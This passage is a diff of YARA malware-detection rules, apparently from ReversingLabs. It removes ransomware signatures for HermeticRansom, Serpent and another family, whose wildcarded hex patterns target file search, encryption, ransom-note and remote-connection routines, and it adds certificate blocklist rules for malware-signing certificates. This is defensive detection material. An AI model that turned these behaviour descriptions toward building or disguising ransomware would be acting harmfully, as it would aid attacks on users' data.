-            8B CE E8 ?? ?? ?? ?? 59 59 33 DB 53 53 53 57 FF 15 ?? ?? ?? ?? 53 8D 45 ?? 50 FF 75
-            ?? 56 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8D 45 ?? 0F 43
-            4D ?? 83 7D ?? ?? 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 8D 4D ??
-            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C3 E8 ??
-            ?? ?? ?? C3
-        }
-		$encrypt_files_p1 = {
-            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 33 F6 8D 4D ?? 89 B5
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 75 ?? 8D 4D ?? 68 ?? ?? ?? ?? 89 75 ?? 89 75 ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 7D ?? 8B D8 8B 45
-            ?? 0F 43 7D ?? 59 3B D8 77 ?? 85 DB 74 ?? 2B C3 40 03 C7 89 85 ?? ?? ?? ?? 2B C7 50
-            6A ?? 57 EB ?? 53 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 85 ?? ??
-            ?? ?? 46 2B C6 50 6A ?? 56 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? EB ?? 2B F7 EB
-            ?? 83 CE ?? 83 FE ?? 74 ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 50 51 56 8D 4D
-            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 F6 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
-        }
-		$encrypt_files_p2 = {
-            50 E8 ?? ?? ?? ?? 6A ?? 5F 89 7D ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ??
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 51 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? C6 45 ?? ?? 8B C8 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 85
-            ?? ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 39 B5 ?? ?? ?? ?? 74 ?? 83 7D ?? ?? 8D
-            55 ?? FF 75 ?? 0F 43 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 8B 40 ?? 03 C8 8B 51
-            ?? 83 CA ?? 8B C2 0B C7 39 71 ?? 0F 44 D0 52 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 59 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Guangzhou YuanLuo Technology Co.,Ltd" and pe.signatures [ i ] . serial == "0b:72:79:06:8b:eb:15:ff:e8:06:0d:2c:56:15:3c:35" and 1350864000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_0Bc0F18Da36702E302Db170D91Dc9202 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "977d9686-d811-5416-b090-d4f45d7935d0"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16338-L16354"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d9ee2cf63a4edb28f894ea49a5b4df9b818d5764d9a74721b1d5222f53859462"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_rsrc ) and ( all of ( $search_files_p* ) ) and ( all of ( $create_test_file_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foresee Consulting Inc." and pe.signatures [ i ] . serial == "0b:c0:f1:8d:a3:67:02:e3:02:db:17:0d:91:dc:92:02" and 1637712000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Hermeticransom : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Ca9B6F49B8B41204A174C751C73Dc393 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects HermeticRansom ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6aaf89f4-0cf8-5f0e-b89d-01ac7edd06c0"
-		date = "2022-05-13"
-		modified = "2022-05-13"
+		id = "d09658e4-44e4-5c10-a866-ba486000f1b6"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.HermeticRansom.yara#L1-L105"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "123d569a9d9b9d855b3baafd6194f102d82a594fd7a2bba073843a8654a317cb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16356-L16374"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0b6558a7a1b78d471aaadced959ba91e411df50e3cc08e447fe9bd97f9e5cced"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "HermeticRansom"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$drop_ransom_note = {
-            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 3B 41 ??
-            0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 0F 10 04 24 0F 11 44 24 ?? 0F 10 44 24 ?? 0F 11 44 24 ?? 0F 10 44
-            24 ?? 0F 11 04 24 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8D BC 24 ?? ?? ??
-            ?? 48 8D 35 ?? ?? ?? ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48 8B 6D ?? 48
-            89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ??
-            ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ??
-            ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 C7 04 24 ?? ?? ?? ?? 48
-            8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 4C 24 ?? 48 89 8C 24 ?? ??
-            ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 14 24 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            8B 44 24 ?? 48 8B 4C 24 ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 14 24 48 89 4C 24 ?? 48 89
-            44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24
-            ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            8B 44 24 ?? 48 8B 4C 24 ?? 48 89 0C 24 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C
-            24 ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ??
-            ?? 48 89 54 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48
-        }
-		$encrypt_files_p1 = {
-            E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 8C 24 ??
-            ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 89 14 24
-            48 89 74 24 ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 C7 44 24 ?? ??
-            ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 54 24 ?? E8
-            ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 9C 24 ?? ?? ?? ?? 48
-            85 DB 0F 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 89 94 24 ?? ?? ?? ?? 48 8D
-            05 ?? ?? ?? ?? 48 89 04 24 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 48 8B 44 24 ?? 48 89 C1 48 C1 F8 ?? 48
-            C1 E8 ?? 48 01 C8 48 C1 F8 ?? 48 89 84 24 ?? ?? ?? ?? 48 C1 E0 ?? 48 29 C1 48 89 4C
-            24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 04 24 0F 57 C0 0F
-            11 44 24 ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 83 F8 ?? 7E ?? B8 ?? ?? ?? ??
-            48 89 84 24 ?? ?? ?? ?? 31 C9 EB ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ??
-            48 39 C1 0F 8D ?? ?? ?? ?? 48 89 CA 48 C1 E1 ?? 48 FF C2 48 89 D3 48 C1 E2 ?? 48 39
-            D1 0F 87 ?? ?? ?? ?? 48 8B 74 24 ?? 48 39 F2 0F 87 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ??
-            ?? 48 8B 05 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? 48 89 3C 24 48 89
-        }
-		$encrypt_files_p2 = {
-            5C 24 ?? 48 89 44 24 ?? 48 29 CE 48 89 F3 48 F7 DE 48 C1 FE ?? 48 21 CE 48 8B BC 24
-            ?? ?? ?? ?? 48 01 FE 48 89 74 24 ?? 48 29 CA 48 89 54 24 ?? 48 89 5C 24 ?? E8 ?? ??
-            ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 85 DB 0F 85 ??
-            ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 89 1C 24 48 89 44 24 ?? 48 89 4C 24 ?? 48 89 54
-            24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 83 F8 ?? 0F 8D ?? ?? ?? ?? 48 C1 E0 ?? 48 8B
-            4C 24 ?? 48 39 C8 0F 87 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B
-            35 ?? ?? ?? ?? 48 89 14 24 48 89 5C 24 ?? 48 89 74 24 ?? 48 8B 54 24 ?? 48 29 C2 48
-            89 D3 48 F7 DA 48 C1 FA ?? 48 21 C2 48 8B B4 24 ?? ?? ?? ?? 48 01 F2 48 89 54 24 ??
-            48 29 C1 48 89 4C 24 ?? 48 89 5C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ??
-            48 8B 54 24 ?? 48 8B 5C 24 ?? 48 85 DB 74 ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 8C 24 ??
-            ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48
-            81 C4 ?? ?? ?? ?? C3 48 8B 9C 24 ?? ?? ?? ?? 48 89 1C 24 48 89 44 24 ?? 48 89 4C 24
-            ?? 48 89 54 24 ?? E8 ?? ?? ?? ?? 48 8B 84 24
-        }
-		$find_files = {
-            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83
-            EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ??
-            48 89 44 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54
-            24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 89 54
-            24 ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 C7 44 24 ?? ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 8B 94
-            24 ?? ?? ?? ?? 48 89 14 24 48 8B 9C 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 44 24 ?? 48
-            89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 84 24 ??
-            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 04 24 48 89 4C 24 ?? 48 C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 85 C9 75
-            ?? 48 89 44 24 ?? 48 89 04 24 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 85 C0 74 ?? 48 8B 44
-            24 ?? 48 89 04 24 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 C4 ??
-            C3 48 8B 44 24 ?? 48 89 04 24 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 6C 24 ??
-            48 83 C4 ?? C3 48 89 04 24 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 6C 24 ?? 48
-            83 C4 ?? C3 48 8B 44 24
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CodeDance Ltd" and ( pe.signatures [ i ] . serial == "00:ca:9b:6f:49:b8:b4:12:04:a1:74:c7:51:c7:3d:c3:93" or pe.signatures [ i ] . serial == "ca:9b:6f:49:b8:b4:12:04:a1:74:c7:51:c7:3d:c3:93" ) and 1654646400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Serpent : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Aaf65B8E7A2E68Bc8C9E8F27331B795C : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Serpent ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0757ad7c-b2b1-5323-960a-55ffe3eaed12"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "ccb36b8b-301d-5cc2-9c8e-4956b92c1116"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Serpent.yara#L1-L122"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5e1917e8d23a5edc65ac423f3d18cc78c3848bd6c1ccc67d052eb37172857081"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16376-L16394"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "390d074da09d8e5b4bb2a6f4157a5125474ab5c22de62729d4fc4075edade289"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Serpent"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$do_dll_stuff_and_create_thread = {
-            68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 89 D2 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 89 FF 90 90 6A ?? 53 E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 4B 75 ?? BA
-            ?? ?? ?? ?? 66 0F 6E D2 89 FF 89 C9 31 D2 66 0F 7E D2 89 15 ?? ?? ?? ?? 81 3D ?? ??
-            ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 4B 75 ?? BB ?? ?? ?? ?? 89 C9 4B
-            75 ?? 89 C9 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 4B
-            75 ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 79 ?? E8 ??
-            ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 79 ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 4B
-            75 ?? 89 FF 90 BB ?? ?? ?? ?? 89 C9 4B 75 ?? 90 90 BB ?? ?? ?? ?? 4B 75 ?? BB ?? ??
-            ?? ?? 4B 75 ?? BB ?? ?? ?? ?? 4B 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 90 BB ?? ?? ?? ?? 89 D2 4B 75 ?? 6A ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? BA ??
-            ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 90 89 C9 BB ?? ?? ?? ?? 89 FF 4B 75 ?? 68 ?? ?? ?? ??
-            6A ?? 56 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 89 D2 4B 75 ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 33
-            C0 A3 ?? ?? ?? ?? 64 8B 35 ?? ?? ?? ?? 89 35 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ??
-            90 89 F6 90 BB ?? ?? ?? ?? 89 DB 4B 75 ?? 89 D2 89 C0 BB ?? ?? ?? ?? 89 D2 4B 75 ??
-            C7 05 ?? ?? ?? ?? ?? ?? ?? ?? BB ?? ?? ?? ?? 89 FF 4B 75 ?? 89 C0 0F 31 90 89 C7 0F
-            31 90 89 C0 29 F8 89 D2 89 DB 77 ?? 90 90 89 C9 89 F6 8B 3D ?? ?? ?? ?? 90 90 89 C9
-            89 F6 90 03 3D ?? ?? ?? ?? 90 90 89 C9 89 F6 FF D7 89 F6 90 90 BB ?? ?? ?? ?? 4B 75
-            ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? C3
-        }
-		$find_files = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 C0 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45
-            ?? 8B 58 ?? 83 7B ?? ?? 75 ?? 8D 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8D 55 ??
-            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 73 ?? 6A ?? 8D 45 ?? 50 8B 43 ?? 50 E8 ?? ?? ?? ??
-            81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ??
-            50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 43 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C6 85 ??
-            ?? ?? ?? ?? 8B 45 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? C6 85
-            ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 8D ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 EB ?? 8B 43 ?? 89
-            85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B 45 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ??
-            89 B5 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 95 ?? ?? ?? ??
-            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B D8 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$remote_connection = {
-            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 FF 05 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 ??
-            ?? ?? ?? 8D 83 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 66 8B 83
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
-            ?? ?? 8D 55 ?? 33 C0 8A 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 68 ?? ?? ?? ?? 66 8B 83
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
-            ?? ?? 8D 55 ?? 33 C0 8A 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 8D 45 ?? 8D 93 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 8D 45 ?? 8D 93 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ??
-            ?? 8B 08 FF 51 ?? 8D 55 ?? 0F B7 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 8D 55 ?? 0F B7
-            83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55
-            ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 6A ??
-            6A ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 81 FE ?? ?? ?? ?? 76 ?? E8 ?? ?? ?? ?? 66 89 B3 ??
-            ?? ?? ?? 66 C7 45 ?? ?? ?? 66 C7 45 ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 0F B7 C6 50 E8 ?? ?? ?? ?? 66 81 BB ?? ?? ?? ?? ?? ?? 75 ?? 8D 4D ?? 66 BA
-            ?? ?? 8B C3 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 50 0F B7 83 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? FF 0D ?? ?? ??
-            ?? 83 3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8
-        }
-		$remote_ftp_connection = {
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 ?? 66
